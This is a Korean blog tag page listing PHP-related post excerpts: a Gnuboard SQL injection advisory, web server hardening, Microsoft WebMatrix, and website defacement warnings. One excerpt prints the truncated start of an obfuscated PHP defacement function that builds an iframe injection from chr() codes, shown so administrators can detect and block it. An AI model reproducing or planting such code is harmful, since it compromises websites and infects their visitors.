본문 바로가기

php68

728x90
국내 공개 웹 게시판(그누보드) 보안 업데이트 권고 □ 개요 o 국내 PHP기반의 공개 웹 게시판인 그누보드에서 SQL Injection 취약점이 발견됨[1] o 취약한 버전을 사용하고 있을 경우, DB정보 유출 등의 피해를 입을 수 있으므로 웹 관리자의 적극적인 조치 필요 □ 해당시스템 o 영향받는 소프트웨어[1] - 그누보드 4.34.09 및 이전 버전 □ 해결방안 o 그누보드 4.34.09 및 이전버전 사용자는 4.34.10버전으로 업데이트[1] ※ 패치 작업 이전에 원본 파일은 백업 필요 o 그누보드를 새로 설치하는 이용자 - 반드시 보안패치가 적용된 최신버전(4.34.10)을 설치 □ 용어 정리 o PHP : 동적인 웹사이트를 위한 서버 측 스크립트 언어 o SQL Injection : 웹 응용 프로그램에 강제로 SQL구문을 삽입하여 내부 데이터.. 2011. 8. 11.
SecureOS(RedCastle)를 이용한 웹 서버 보안 강화 많은 기업들이 방화벽이나 IPS와 같은 네트워크 기반의 보안 솔루션을 도입하여 운영중인 서버들을 인터넷을 통해 시도되는 공격 위협으로부터 서버들을 보호하고 있다. 하지만 기업들도 어쩌지 못하는 취약한 구멍이 존재한다. 바로 기업의 홈페이지가 구동중인 웹 서버와 메일서버다. 그리고 기업들이 운영하는 B2B와 같이 인터넷에 공개할 수 밖에 없는 서버가 존재한다. 그리고 이렇게 인터넷에 공개되는 서비스들은 대부분 웹서버(TCP/80)로 운영되어 진다. 다른 서비스는 모두 차단되어 있지만 웹서비스를 수행하는 TCP/80은 기업으로서도 어쩔 수 없는 아킬레스건과 같은 존재다. 해커들은 이러한 아킬레스건을 절대 그냥 두지 않는다. Apache, Tomcat, Weblogic, Webtob, Jeus 등 수많은 웹 .. 2011. 2. 15.
MS, 오픈소스 웹개발툴 WebMatrix 마이크로소프트가 초보 웹 개발자들이나 이제 막 웹 개발에 입문하려는 개발자들을 위해 웹 개발 툴 킷인 웹매트릭스(WebMatrix)를 발표했다. 흥미로운 사실은 이 툴킷이 오픈소스 소프트웨어라는 것. 웹매트릭스는 개발툴을 비롯해 웹사이트를 구동하기 위한 웹 서버, 데이터베이스, 웹 프레임워크, 사용자 검색 편의를 도모할 수 있는 검색엔진 등의 기능도 제공한다. 또한 좀 더 다양한 프로그래밍 체계 지원을 위해 ASP.NET의 ‘Razor’나 PHP, 웹 도움말 기능 등을 제공한다. 트위터 피드나 비디오 같은 다중 코드를 지원하기 위해 싱글 코드라인도 제공한다. 웹매트릭스는 9개의 언어로 제공되며 워드프레스(WordPress), 줌라(Joomla!), 닷넷누크(DotNetNuke), 움바코(Umbarco)등.. 2011. 1. 18.
Mass SQL Injection Attack Code (PHP, MySQL) * 홈페이지 변조 및 Mass SQL Injection을 통해 대량 악성코드 유포 발생 - 최근 공격 코드 유형 파악해서 차단이나 알람 대응 필요 # 홈페이지 변조 코드 function gmfun($path){$daima=chr(60).chr(105).chr(102).chr(114).chr(97).chr(109).chr(101).chr(32).chr(115).chr(114).chr(99). chr(61).chr(38).chr(35).chr(120).chr(54).chr(56).chr(59).chr(38).chr(35).chr(120).chr(55).chr(52).chr(59). chr(38).chr(35).chr(120).chr(55).chr(52).chr(59).chr(38).chr(35).chr(12.. 2010. 12. 28.
홈페이지 변조 악성코드 삽입 (PHP 사용 주의) 최근에 발생되는 홈페이지 변조를 통해 악성코드를 삽입하여 유포되는 해킹사고가 있었으며 현재도 계속 진행중에 있습니다. 제로보드와 몇 사이트에서 관련 정보가 점차 오픈되면서 분석 내용과 조치 사항이 나오고 있는데 문제는 제로보드의 취약점만으로 본다는 것입니다. 현재는 공개된 PHP 웹솔루션 중 많이 알려진 제로보드를 통해 발생하고 있지만 이번에 확인된 문제는 특정 솔루션(제로보드)만의 문제가 아닐 수 있습니다. 이는 PHP 권고 방식을 사용하지 않을 경우 문제가 발생될 수 있어 위험한 수준에 있습니다. 단, 몇일전 포스팅한 PHP 안전한 환경에 언급한 옵션인 상태라면 현재로선 이번 사고에 대해서는 안전할 수 있을 것 같습니다. PHP 안전한 환경 (공개용 PHP 솔루션 사용시 주의사항) - http://b.. 2010. 12. 23.
728x90
728x90